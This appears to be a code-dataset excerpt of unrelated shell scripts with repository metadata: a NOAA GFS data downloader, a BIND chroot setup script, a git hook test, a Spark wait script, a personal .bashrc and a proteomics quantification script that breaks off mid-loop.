printf "Inputfile for %d failed with %s at %s.\\n" "${i}" "${RETURN_CODE}" "$(date +"%T")" >> "${INFO_LOG}"
fi
done
if [[ "${RETRIES}" -eq 10 ]]; then
printf "Error while downloading %d at %s.\\n" "${i}" "$(date +"%T")" >> "${INFO_LOG}"
exit 1
fi
done
}
# function to fetch the input data with wget
gfs_fetch_wget () {
# Fetch the new input files
for i in $(seq -f %03g 0 3 "${5}"); do
wget -q -P "${3}" "${GFS_URL}"gfs."${1}"/"${2}"/atmos/gfs.t"${2}"z.pgrb2."${4}".f"${i}"
done
# Check and continue broken files
for i in $(seq -f %03g 0 3 "${5}"); do
wget -c -q -P "${3}" "${GFS_URL}"gfs."${1}"/"${2}"/atmos/gfs.t"${2}"z.pgrb2."${4}".f"${i}"
done
}
# backup function to fetch the input data from the ftp server with curl
gfs_ftp_fetch_curl () {
GFS_URL="ftp://ftp.ncep.noaa.gov/pub/data/nccf/com/gfs/prod/"
# Define a number of retries and try to download the files
for i in $(seq -f %03g 0 3 "${5}"); do
RETRIES=0
while [ "${RETRIES}" -lt 10 ]; do
# -f fail silenty, -C continue if interrupted, -o define output; loop breaks if file was loaded successfully
curl -f -C - -o "${3}"/gfs.t"${2}"z.pgrb2."${4}".f"${i}" "${GFS_URL}"gfs."${1}"/"${2}"/atmos/gfs.t"${2}"z.pgrb2."${4}".f"${i}" && break
((RETRIES++))
done
if [[ "${RETRIES}" -eq 10 ]]; then
printf "Error while downlaoding %d at %s.\\n" "${i}" "$(date +"%T")" >> "${INFO_LOG}"
exit 1
fi
done
}
# error handling for input parameter
if [ "$#" -ne 5 ]; then
printf "%bWrong number of arguments. Must be one for <DATE> <TIMESTAMP> <STORAGE_PATH> <GEO_RESOLUTION> <PERIOD>.%b\\n" "${RED}" "${NC}"
exit 1
fi
# logging time stamp
printf "Starting gfs data fetch by removing old files at %s.\\n" "$(date +"%T")" >> "${INFO_LOG}"
# Remove old gfs files
rm "${3}"/gfs.*
printf "Starting gfs data fetching at %s.\\n" "$(date +"%T")" >> "${INFO_LOG}"
# use fetch via curl at this point
gfs_fetch_curl "${1}" "${2}" "${3}" "${4}" "${5}"
| true |
e07004b38bb110091b5b1cad7ef95bc7aba91385 | Shell | jiaedu/student | /sh/setup-named-chroot.sh | UTF-8 | 1,969 | 4.1875 | 4 | [] | no_license | #!/bin/bash
ROOTDIR_MOUNT='/etc/localtime /etc/named /etc/pki/dnssec-keys /etc/named.root.key /etc/named.conf
/etc/named.dnssec.keys /etc/named.rfc1912.zones /etc/rndc.conf /etc/rndc.key
/usr/lib64/bind /usr/lib/bind /etc/named.iscdlv.key /run/named /var/named
/etc/protocols /etc/services'
usage()
{
echo
echo 'This script setups chroot environment for BIND'
echo 'Usage: setup-named-chroot.sh ROOTDIR [on|off]'
}
if ! [ "$#" -eq 2 ]; then
echo 'Wrong number of arguments'
usage
exit 1
fi
ROOTDIR="$1"
# Exit if ROOTDIR doesn't exist
if ! [ -d "$ROOTDIR" ]; then
echo "Root directory $ROOTDIR doesn't exist"
usage
exit 1
fi
mount_chroot_conf()
{
if [ -n "$ROOTDIR" ]; then
for all in $ROOTDIR_MOUNT; do
# Skip nonexistant files
[ -e "$all" ] || continue
# If mount source is a file
if ! [ -d "$all" ]; then
# mount it only if it is not present in chroot or it is empty
if ! [ -e "$ROOTDIR$all" ] || [ `stat -c'%s' "$ROOTDIR$all"` -eq 0 ]; then
touch "$ROOTDIR$all"
mount --bind "$all" "$ROOTDIR$all"
fi
else
# Mount source is a directory. Mount it only if directory in chroot is
# empty.
if [ -e "$all" ] && [ `ls -1A $ROOTDIR$all | wc -l` -eq 0 ]; then
mount --bind --make-private "$all" "$ROOTDIR$all"
fi
fi
done
fi
}
umount_chroot_conf()
{
if [ -n "$ROOTDIR" ]; then
for all in $ROOTDIR_MOUNT; do
# Check if file is mount target. Do not use /proc/mounts because detecting
# of modified mounted files can fail.
if mount | grep -q '.* on '"$ROOTDIR$all"' .*'; then
umount "$ROOTDIR$all"
# Remove temporary created files
[ -f "$all" ] && rm -f "$ROOTDIR$all"
fi
done
fi
}
case "$2" in
on)
mount_chroot_conf
;;
off)
umount_chroot_conf
;;
*)
echo 'Second argument has to be "on" or "off"'
usage
exit 1
esac
exit 0
| true |
6b73ecc65243e851794300339ae107b22350c38f | Shell | mike-sandler/git_hooks | /.git_hooks/tests/pre-commit_docs_test.bash | UTF-8 | 827 | 3.328125 | 3 | [] | no_license | #!/usr/bin/env bash
USE_HOOKS="docs"
. test_helper
documented_code="
# class A description\n
class A\n
# method doc\n
def meth; end\n\n
# method doc\n
def meth2; end\n
end\n "
undocumented_code="
class A\n
def meth; end\n
def meth2; end\n
end\n "
test_decline_documentation(){
mkdir lib
echo -e $documented_code > ./lib/a.rb
git add ./lib/a.rb
git commit -m 'documented commit' > /dev/null
echo -e $undocumented_code > ./lib/a.rb
git add ./lib/a.rb
output=$(git ci -m 'undocumented commit' 2>&1) #> /dev/null
assertTrue "echo '${output}' | grep 'You removed documentation for 1 classes'"
assertTrue "echo '${output}' | grep 'You removed documentation for 2 methods'"
assertTrue "echo '${output}' | grep 'You decline documentation'"
}
. ./shunit2
| true |
4e088c2076dce6fcdc35932258eaf567fbd0b3d0 | Shell | fermi-lat/rootUtil | /apps/TRY | UTF-8 | 421 | 2.75 | 3 | [
"BSD-3-Clause"
] | permissive | #!/usr/bin/env sh
clear
cmd="cel$1.exe"
cd ../cmt
make || exit
. setup.sh
cd ../apps
export PATH=../${CMTCONFIG}:${PATH}
if [ $1 != "Convert" -a $1 != "Inspect" ] ; then
celInspect.exe test.cel.root
echo "%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%"
fi
$cmd test.cel.root
if [ $1 != "Convert" -a $1 != "Inspect" ] ; then
celInspect.exe test.cel.root
echo "%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%"
fi
| true |
c405a822a8a6d120074a023716adca1ea57e8a80 | Shell | yzotov/centos7-cuda-spark-daemon | /wait-spark.sh | UTF-8 | 909 | 3.3125 | 3 | [] | no_license | #!/usr/bin/env bash
sbin="`dirname "$0"`"
sbin="`cd "$sbin"; pwd`"
. "$sbin/spark-config.sh"
# get arguments
command=$1
shift
instance=$1
shift
. "$SPARK_PREFIX/bin/load-spark-env.sh"
if [ "$SPARK_IDENT_STRING" = "" ]; then
export SPARK_IDENT_STRING="$USER"
fi
export SPARK_PRINT_LAUNCH_COMMAND="1"
# get log directory
if [ "$SPARK_LOG_DIR" = "" ]; then
export SPARK_LOG_DIR="$SPARK_HOME/logs"
fi
if [ "$SPARK_PID_DIR" = "" ]; then
SPARK_PID_DIR=/tmp
fi
# some variables
log="$SPARK_LOG_DIR/spark-$SPARK_IDENT_STRING-$command-$instance-$HOSTNAME.out"
pid="$SPARK_PID_DIR/spark-$SPARK_IDENT_STRING-$command-$instance.pid"
# Set default scheduling priority
if [ "$SPARK_NICENESS" = "" ]; then
export SPARK_NICENESS=0
fi
if [ -f $pid ]; then
TARGET_PID=`cat $pid`
while kill -0 $TARGET_PID > /dev/null 2>&1; do
echo "Waiting of spark process $TARGET_PID..."
sleep 1;
done
fi
| true |
db94d793619593acb94e4fa5476fe7f98a0e2dad | Shell | cwonrails/dotfiles | /trusty/.bashrc | UTF-8 | 4,216 | 3.40625 | 3 | [
"MIT"
] | permissive | #!/usr/bin/env bash
# Enables distinguishing between Mac (Darwin) and Linux
export PLATFORM=$(uname -s)
# Set command prompt options
PS1="\n\u @\h [\d \@]\n\w "
# Enable command prompt coloring
export CLICOLOR=1
# Set vim as default editor
export EDITOR='vim'
# Enable vi mode in shell
set -o vi
# Enable bash aliases if present
if [ -f ~/.bash_aliases ]; then
. ~/.bash_aliases
fi
# enable bash completion in interactive shells
if ! shopt -oq posix; then
if [ -f /usr/share/bash-completion/bash_completion ]; then
. /usr/share/bash-completion/bash_completion
elif [ -f /etc/bash_completion ]; then
. /etc/bash_completion
fi
fi
# Enable chruby
source /usr/local/share/chruby/chruby.sh
chruby ruby 2.3.0
# Golang env variables
export GOPATH=$HOME/go
export GOBIN=$GOPATH/bin
# export PATH=$GOPATH/bin:$PATH
export PATH=$PATH:/usr/local/go/bin
export PATH=/usr/local/bin:$PATH
export PATH=/usr/local/sbin:$PATH
# Enable terraform
PATH=/usr/local/terraform/bin:$HOME/terraform:$PATH
# Enable hub: https://github.com/github/hub
eval "$(hub alias -s)"
. /home/cwonlinux/hub/etc/hub.bash_completion.sh
# Enable thefuck: https://github.com/nvbn/thefuck
alias fuck='$(thefuck $(fc -ln -1))'
# Add tab completion for SSH hostnames based on ~/.ssh/config, ignoring wildcards
[ -e "$HOME/.ssh/config" ] && complete -o "default" -o "nospace" -W "$(grep "^Host" ~/.ssh/config | grep -v "[?*]" | cut -d " " -f2- | tr ' ' '\n')" scp sftp ssh;
# Add `~/bin` to the `$PATH`
export PATH="$HOME/bin:$PATH";
# Load the shell dotfiles, and then some:
# * ~/.path can be used to extend `$PATH`.
# * ~/.extra can be used for other settings you don’t want to commit.
for file in ~/.{path,bash_prompt,exports,aliases,functions,extra}; do
[ -r "$file" ] && [ -f "$file" ] && source "$file";
done;
unset file;
# Enable tab completion for `g` by marking it as an alias for `git`
if type _git &> /dev/null && [ -f /usr/local/etc/bash_completion.d/git-completion.bash ]; then
complete -o default -o nospace -F _git g;
fi;
# Case-insensitive globbing (used in pathname expansion)
shopt -s nocaseglob;
# Append to the Bash history file, rather than overwriting it
shopt -s histappend;
# Autocorrect typos in path names when using `cd`
shopt -s cdspell;
# Use correct grep
alias grep="/bin/grep"
# Always enable colored grep output
alias grep='grep --color=auto'
alias fgrep='fgrep --color=auto'
alias egrep='egrep --color=auto'
# Use Git’s colored diff when available
hash git &>/dev/null;
if [ $? -eq 0 ]; then
function diff() {
git diff --no-index --color-words "$@";
}
fi;
# Use the text that has already been typed as the prefix for searching through
# commands (i.e. more intelligent Up/Down behavior)
bind '"\e[A": history-search-backward'
bind '"\e[B": history-search-forward'
# Detect which `ls` flavor is in use
if ls --color > /dev/null 2>&1; then # GNU `ls`
colorflag="--color"
else # OS X `ls`
colorflag="-G"
fi
# Enable gulp completion
# eval "$(gulp --completion=bash)"
# Enable jump (more focused version of fasd)
# eval "$(jump shell bash)"
# List all files colorized in long format
alias l="ls -lF ${colorflag}"
# List all files colorized in long format, including dot files
alias la="ls -laF ${colorflag}"
# List only directories
alias lsd="ls -lF ${colorflag} | grep --color=never '^d'"
# List only hidden files
alias lh="ls -d .*"
# Always use color output for `ls`
alias ls="command ls ${colorflag}"
export LS_COLORS='no=00:fi=00:di=01;34:ln=01;36:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arj=01;31:*.taz=01;31:*.lzh=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.gz=01;31:*.bz2=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.jpg=01;35:*.jpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:*.mov=01;35:*.mpg=01;35:*.mpeg=01;35:*.avi=01;35:*.fli=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:*.xwd=01;35:*.ogg=01;35:*.mp3=01;35:*.wav=01;35:'
[ -f ~/.fzf.bash ] && source ~/.fzf.bash
export N_PREFIX="$HOME/n"; [[ :$PATH: == *":$N_PREFIX/bin:"* ]] || PATH+=":$N_PREFIX/bin" # Added by n-install (see http://git.io/n-install-repo).
| true |
4689e1d8213301f832ba6a425c5b649ad5bc6408 | Shell | WYWLMayo/consolidate | /consolidate.sh | UTF-8 | 19,324 | 3.515625 | 4 | [] | no_license |
echo "Please select the Organism for database searching:"
PS3_OLD=$PS3
PS3="Please make a selection=> "; export PS3;
select Database in Mouse Human Zebra_fish None
do
case $Database in
Mouse) LB_1="Mouse";LB_2="musculus";LB_3="mouse"; DB="MM";Uniq="Mm.seq.uniq";break;;
Human) LB_1="Homo";LB_2="Human";LB_3="sapiens"; DB="HS";Uniq="Hs.seq.uniq";break;;
Zebra_fish) LB_1="ebra";LB_2="rerio";LB_3="Danio"; DB="est_others";Uniq="Dr.seq.uniq";break;;
None) break;;
*) echo "ERROR: Invalid selection, $REPLY.";;
esac
done
PS3=$PS3_OLD;
echo "Please specify the labeling system:"
PS3_OLD=$PS3
PS3="Please make a selection=> "; export PS3;
select Label in SILAC iTRAQ-4 iTRAQ-8 TMT-6 TMT-10 TMT-Pro None
do
case $Label in
SILAC) Label="SILAC"; break;;
iTRAQ-4) Label="iTRAQ-4";Iso_IntF="y"; break;;
iTRAQ-8) Label="iTRAQ-8";Iso_IntF="y"; break;;
TMT-6) Label="TMT-6";Iso_IntF="y"; break;;
TMT-10) Label="TMT-10";Iso_IntF="y"; break;;
TMT-Pro) Label="TMT-Pro";Iso_IntF="y"; break;;
None) Label="NONE"; break;;
*) echo "ERROR: Invalid selection, $REPLY.";;
esac
done
PS3=$PS3_OLD;
printf "\n" ;
_starttime=$(date +%s)
for i
do
name=${i%.*}
Time=`date +%Y-%m-%d:%H:%M:%S | awk '{split($1,t,":"); T=t[2] t[3]; gsub("-","",t[1]); print t[1] "-" T;}'`
FOLDER=`echo $name $Time | awk '{print $2 "-" $1;}'`
mkdir $FOLDER
mv $i $FOLDER
cd $FOLDER
_Iso_IntF="No";
if [ "$Iso_IntF" = "y" ]; then
echo "Would you like to apply filter for Isolation Interference?"
echo "If Yes, please specified the cutoff value. (Recommend: 30):"
echo "If No, please input "No": "
read _Iso_IntF ;
if [ "$_Iso_IntF" != "No" ]; then
echo "### Selecting spectra without Isolation Interference."
awk -F"\t" -v IsoIFN=$_Iso_IntF -v name=$name '
BEGIN { file_NoCoElut=name ".NoCoElut"; file_CoElut=name ".CoElut";}
/Sequence/ { for (fs=1; fs<=NF; fs=fs+1)
{if ($fs ~ "Interference")
{IntF=fs;
}
}
printf "%-s\n", $0 > file_NoCoElut; close(file_NoCoElut)
printf "%-s\n", $0 > file_CoElut; close(file_CoElut)
}
!/Sequence/ {if (($IntF < IsoIFN) && (length($0) > 100)) {printf "%-s\n", $0 >> file_NoCoElut; close(file_NoCoElut)}
if ($IntF >= IsoIFN) {printf "%-s\n", $0 >> file_CoElut; close(file_CoElut)}
}' $i
i=$name.NoCoElut;
CoIso=`wc -l $name.CoElut | awk '{print $1;}'`
NoCoIso=`wc -l $name.NoCoElut | awk '{print $1;}'`
echo "### $CoIso PSM with isolation interference, and $NoCoIso PSM with no or low isolation interference."
echo "### $CoIso PSMs with isolation interference, and $NoCoIso PSMs with no or low isolation interference (cutoff: $_ISO_IntF)." > $name.sumarry
else
echo "No isolation interference filter was performed." >> $name.sumarry
fi
printf "\n" ;
fi
echo "Would you like to reassign the phosphorylation sites based on phophoRS results?"
echo "If yes, please provide the cutoff score (>70 is recommended, or please input No)."
read _phRS
if [ "$_phRS" != "n" ]; then
phRS=$_phRS;
fi
printf "\n" ;
if [ "$phRS" != "No" ]; then
echo "> Re-assigning phosphorylation sites (phosphoRS - $phRS):"
## Reassign phosphosites based on phosphRS result and remove Ambiguous phosphopeptides
## if [ "$_Iso_IntF" = "No" ]; then
## /xinyanwu/MS_databases/programs/GoDaddy/phRS.assign $i > $name.phRS
## entry=`wc -l $i | awk '{print $1;}'`
## else
## /xinyanwu/MS_databases/programs/GoDaddy/phRS.assign $name.NoCoElut > $name.phRS
## entry=`wc -l $name.NoCoElut | awk '{print $1;}'`
## fi
/research/labs/proteomics/pandey/m202766/programs/phRS.assign $i $phRS > $name.phRS
entry=`wc -l $i | awk '{print $1;}'`
grep -v -w "Ambiguous" $name.phRS > $name.phRS_non
grep -w "Ambiguous" $name.phRS > $name.phRS_amb
Non_amb=`wc -l $name.phRS_non | awk '{print $1;}'`
Amb=`wc -l $name.phRS_amb | awk '{print $1;}'`
i="$name.phRS_non"
echo " $Non_amb unambiguous PSMs and $Amb ambiguous PSMs are in $entry total identified PSMS."
echo " $Non_amb unambiguous PSMs and $Amb ambiguous PSMS are in $entry total identified PSMs (phosphoRS cutoff: $phRS)." >> $name.sumarry
printf "\n";
else
echo "No phosphoRS filter is performed." >> $name.sumarry
fi
echo "> Processing quant values ($Label)."
## get information of cell names or experiment groups
awk -F"\t" '/Sequence/ {for (fs=1; fs<=NF; fs=fs+1)
{if ($fs ~ "Experiment")
{Exp=fs;
}
}
}
{split($Exp,expt,".");
if ((expt[1] !~ "Experiment") && (length(expt[1]) > 0))
{print expt[1];
}
}' $i | sort | uniq > _experiment
awk -F"\t" '/Sequence/ {for (fs=1; fs<=NF; fs=fs+1)
{if ($fs ~ "Enrichment")
{Rich=fs;
}
}
}
{split($Rich,rich,".");
if ((rich[1] !~ "Enrichment") && (length(rich[1]) > 0))
{print rich[1];
}
}' $i | sort | uniq > _enrichment
## write table head to temp a file
head -n1 $i | awk '{ printf "%-s\t%-s\t%-s\n", "Sequence_M", "File_Scan", $0;}' > _$i;
## differentiate 3-states or 2 states silac
if [ "$Label" = "SILAC" ] ; then
Label=`head -n1 $i | awk '{if ( $0 ~ "Medium") {print "SILAC-3";} else {print "SILAC-2";}}'`;
fi
## change phosphoAA labels and remove other modifications, and concatenate scan number with file name
awk -F"\t" '/Sequence/ {for (fs=1; fs<=NF; fs=fs+1)
{if (($fs == "Sequence")|| ($fs == "Annotated Sequence")) {Seq=fs;};
if ($fs == "First Scan") {scanNo=fs;}
if ($fs ~ "Spectrum File") {file=fs;}
if ($fs == "Modifications") {Modification=fs;}
if ($fs == "Sequence_Ori") {phRS="Yes"}
if ($fs == "Annotated Sequence") {version="2.0"}
if ($fs == "Enrichment") {Rich=fs}
}
}
{if ($0 !~ "Sequence")
{Sequence=$Seq;
if (phRS == "Yes")
{if (($Rich == "pY") || ($Rich == "IMAC") || ($Rich == "TiO2"))
{Sequence=$Seq; gsub("s","pS",Sequence);
gsub("t","pT",Sequence);gsub("y","pY",Sequence);
if (Sequence ~ "].")
{n=split(Sequence,pep,"."); Sequence=pep[2];
}
}
if ($Rich == "AceK")
{gsub("k","aceK",Sequence);
if (Sequence ~ "].")
{n=split(Sequence,pep,"."); Sequence=pep[2];
}
}
if ($Rich == "UbK")
{Sequence=$Seq; gsub("k","ggK",Sequence);
if (Sequence ~ "].")
{n=split(Sequence,pep,"."); Sequence=pep[2];
}
}
} else
{if (version == "2.0")
{mPh=0;
if (($Rich == "pY") || ($Rich == "IMAC") || ($Rich == "TiO2")) {PTM="Phospho"; ptm="p";}
if ($Rich == "AceK") {PTM="Acetyl"; ptm="ace";}
if ($Rich == "UbK") {PTM="GG"; ptm="gg";}
if (Sequence ~ "].")
{n=split(Sequence,pep,"."); Sequence=toupper(pep[2]);}
else {Sequence=toupper(Sequence)}
m=split($Modification,MOD,"; ");
for (i=1; i<=m; i=i+1)
{ if (MOD[i] ~ PTM)
{mPh=mPh+1; split(MOD[i],PH,"(");
PhSite[mPh]=substr(PH[1],2);
}
}
for (m=1; m<=mPh; m=m+1)
{ Sequence=substr(Sequence,1,(PhSite[m]+m-2)) ptm substr(Sequence,(PhSite[m]+m-1));
}
} else { gsub("m","M",Sequence); gsub("c","C",Sequence);
gsub("k","K",Sequence); gsub("r","R",Sequence);
gsub("s","pS",Sequence); gsub("t","pT",Sequence);
gsub("y","pY",Sequence); gsub("q","Q",Sequence);
}
}
printf "%-s\t%-s\t%-s\n", Sequence, $file $scanNo, $0;
}
}' $i >> _$i
## generate unique peptides list for query
E=`awk -F"\t" 'NR == 1 { for (fs=1;fs<=NF;fs=fs+1)
{if ($fs == "Identifying Node")
{Engine=fs; printf "%-s\t", Engine;
}
}
}
NR > 1 { if ( $Engine ~ "Mascot" ) {mascot="yes"}
if ( $Engine ~ "Sequest" ) {sequest="yes"}
}
END { if ((mascot == "yes") && (sequest == "yes"))
{ printf "%-s\n", "both"} else {printf "%-s\n", "one"}
}' _$i`
Engine=`echo "$E" | awk '{print $2}'`
EC=`echo "$E" | awk '{print $1}'`
echo $E
echo $Engine "###" $EC
if [ $Engine = "both" ]; then
head -n1 _$i > __$i
awk -F"\t" -v EC="$EC" ' NR > 1 {print $0}' _$i | sort -t $'\t' -i -r -k$EC,$EC | sort -t $'\t' -i -u -k2,2 >> __$i
cp __$i _$i
fi
awk '$0 !~ "Sequence" {print $1;}' _$i |sort|uniq > _uniqPep
## generate value of cell name or experiment groups for importing into awk programs
Exp_Name=`awk 'BEGIN {printf "%-s\t%-s\t", "Peptides", "GI";} {printf "%-s\t",$1; } END {printf "\n";}' _experiment`
## echo "$Exp_Name" , ">>>>>777777777>>>>>", $Med;
if [ "$Label" != "NONE" ]; then
## write table titles
echo "$Exp_Name" | awk -F"\t" -v Label=$Label '
{ printf "%-s\t", $1;
for (i=3; i<NF; i=i+1)
{ if (Label == "SILAC-2")
{printf "%-s\t%-s\t%-s\t%-s\t", $i "_PH", $i "_SumL", $i "_SumH", $i "_Ratio"; }
if (Label == "SILAC-3")
{printf "%-s\t%-s\t%-s\t%-s\t", $i "_PH", $i "_SumL", $i "_SumM", $i "_SumH";}
if (Label == "iTRAQ-4")
{printf "%-s\t%-s\t%-s\t%-s\t%-s\t",$i "_PH", $i "_Sum114", $i "_Sum115",$i "_Sum116",$i "_Sum117";}
if (Label == "iTRAQ-8")
{printf "%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t",$i "_PH", $i "_Sum113", $i "_Sum114", $i "_Sum115",$i "_Sum116",$i "_Sum117", $i "_Sum118",$i "_Sum119",$i "_Sum121";}
if (Label == "TMT-6")
{printf "%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t",$i "_PH", $i "_Sum126", $i "_Sum127",$i "_Sum128",$i "_Sum129", $i "_Sum130",$i "_Sum131";}
if (Label == "TMT-10")
{printf "%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t",$i "_PH", $i "_Sum126", $i "_Sum127N",$i "_Sum127C",$i "_Sum128N",$i "_Sum128C",$i "_Sum129N",$i "_Sum129C",$i "_Sum130N",$i "_Sum130C",$i "_Sum131";}
if (Label == "TMT-Pro")
{printf "%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t", $i "_PH", $i "_Sum126", $i "_Sum127N", $i "_Sum127C", $i "_Sum128N", $i "_Sum128C", $i "_Sum129N", $i "_Sum129C", $i "_Sum130N", $i "_Sum130C", $i "_Sum131N", $i "_Sum131C", $i "_Sum132N", $i "_Sum132C", $i "_Sum133N", $i "_Sum133C", $i "_Sum134N";}
printf "\n";}}' > $name\_sum.xls
echo "$Exp_Name" | awk -F"\t" -v Label=$Label '
{ printf "%-s\t", $1;
for (i=3; i<NF; i=i+1)
{ if (Label == "SILAC-2")
{printf "%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t", $i "_PH", $i "_SumL", $i "_AveL", $i "_cvL", $i "_SumH", $i "_AveH", $i "_cvH"; }
if (Label == "SILAC-3")
{printf "%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t", $i "_PH", $i "_SumL", $i "_AveL", $i "_cvL", $i "_SumM", $i "_AveM", $i "_cvM", $i "_SumH", $i "_AveH", $i "_cvH";}
if (Label == "iTRAQ-4")
{printf "%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t" $i "_PH", $i "_Sum114", $i "_Ave114", $i "_cv114", $i "_Sum115", $i "_Ave115", $i "_cv115", $i "_Sum116", $i "_Ave116", $i "_cv116", $i "_Sum117", $i "_Ave117", $i "_cv117";}
if (Label == "iTRAQ-8")
{printf "%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t",$i "_PH", $i "_Sum113", $i "_Ave113", $i_cv113, $i "_Sum114", $i "_Ave114", $i "_cv114", $i "_Sum115", $i "_Ave115", $i "_cv115", $i "_Sum116", $i "_Ave116", $i "_cv116", $i "_Sum117", $i "_Ave117", $i "_cv117", $i "_Sum118", $i "_Ave118", $i "_cv118", $i "_Sum119", $i "_Ave119", $i "_cv119", $i "_Sum121", $i "_Ave121", $i "_cv121";}
if (Label == "TMT-6")
{printf "%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t",$i "_PH", $i "_Sum126", $i "_Ave126", $i "_cv126", $i "_Sum127", $i "_Ave127", $i "_cv127", $i "_Sum128", $i "_Ave128", $i "_cv128", $i "_Sum129", $i "_Ave129", $i "_cv129", $i "_Sum130", $i "_Ave130", $i "_cv130", $i "_Sum131", $i "_Ave131", $i "_cv131";}
if (Label == "TMT-10")
{printf "%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t",$i "_PH", $i "_Sum126", $i "_Ave126", $i "_cv126",$i "_Sum127N", $i "_Ave127N", $i "_cv127N",$i "_Sum127C", $i "_Ave127C", $i "_cv127C", $i "_Sum128N", $i "_Ave128N", $i "_cv128N", $i "_Sum128C", $i "_Ave128C", $i "_cv128C", $i "_Sum129N", $i "_Ave129N", $i "_cv129N", $i "_Sum129C", $i "_Ave129C", $i "_cv129C", $i "_Sum130N", $i "_Ave130N", $i "_cv130N", $i "_Sum130C", $i "_Ave130C", $i "_cv130C", $i "_Sum131", $i "_Ave131", $i "_cv131";}
if (Label == "TMT-Pro")
{printf "%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t",$i "_PH", $i "_Sum126", $i "_Ave126", $i "_cv126",$i "_Sum127N", $i "_Ave127N", $i "_cv127N",$i "_Sum127C", $i "_Ave127C", $i "_cv127C", $i "_Sum128N", $i "_Ave128N", $i "_cv128N", $i "_Sum128C", $i "_Ave128C", $i "_cv128C", $i "_Sum129N", $i "_Ave129N", $i "_cv129N", $i "_Sum129C", $i "_Ave129C", $i "_cv129C", $i "_Sum130N", $i "_Ave130N", $i "_cv130N", $i "_Sum130C", $i "_Ave130C", $i "_cv130C", $i "_Sum131N", $i "_Ave131N", $i "_cv131N", $i "_Sum131C", $i "_Ave131C", $i "_cv131C", $i "_Sum132N", $i "_Ave132N", $i "_cv132N", $i "_Sum132C", $i "_Ave132C", $i "_cv132C", $i "_Sum133N", $i "_Ave133N", $i "_cv133N", $i "_Sum133C", $i "_Ave133C", $i "_cv133C", $i "_Sum134N", $i "_Ave134N", $i "_cv134N";}
}
printf "\n";}' > $name\_ave.xls
## echo "$Exp_Name" | awk -F"\t" -v Label=$Label '
## { printf "%-s\t%-s\t", $1, $2;
## for (i=3; i<NF; i=i+1)
## { if (Label == "SILAC-2")
## {printf "%-s\t%-s\t%-s\t%-s\t", $i "_PH", $i "_MaxL", $i "_MaxH", $i "_Ratio"; }
## if (Label == "SILAC-3")
## {printf "%-s\t%-s\t%-s\t%-s\t", $i "_PH", $i "_MaxL", $i "_MaxM", $i "_MaxH";}
## if (Label == "iTRAQ-4")
## {printf "%-s\t%-s\t%-s\t%-s\t%-s\t",$i "_PH", $i "_Max114", $i "_Max115",$i "_Max116",$i "_Max117";}
## if (Label == "iTRAQ-8")
## {printf "%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t",$i "_PH", $i "_Max113", $i "_Max114", $i "_Max115",$i "_Max116",$i "_Max117", $i "_Max118",$i "_Max119",$i "_Max121";}
## if (Label == "TMT-6")
## {printf "%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t",$i "_PH", $i "_Max126", $i "_Max127",$i "_Max128",$i "_Max129", $i "_Max130",$i "_Max131";}
## if (Label == "TMT-10")
## {printf "%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t",$i "_PH", $i "_Max126", $i "_Max127N",$i "_Max127C",$i "_Max128N",$i "_Max128C",$i "_Max129N",$i "_Max129C",$i "_Max130N",$i "_Max130C",$i "_Max131";}
## }
## printf "\n";}' > $name\_max.xls
if [ "$Label" = "SILAC" ] ; then
Quant=`head -n1 _$i|awk -F"\t" '{for (fs=1; fs<=NF; fs=fs+1)
{if (($fs == "QuanResultID") || ($fs ~ "Quan Result ID"))
{quant=fs;
}
} print quant;
}'`
fi
## echo "QQQQQQQQQQQQQQ>>>>>>>>>", $Quant;
n=0;
STARTTIME=$(date +%s)
No_uniqPep=`wc -l _uniqPep| awk '{print $1;}'`
while read Line
do
head -n1 _$i > _pep
n=$(($n+1));
if [ "$Label" = "SILAC" ] ; then
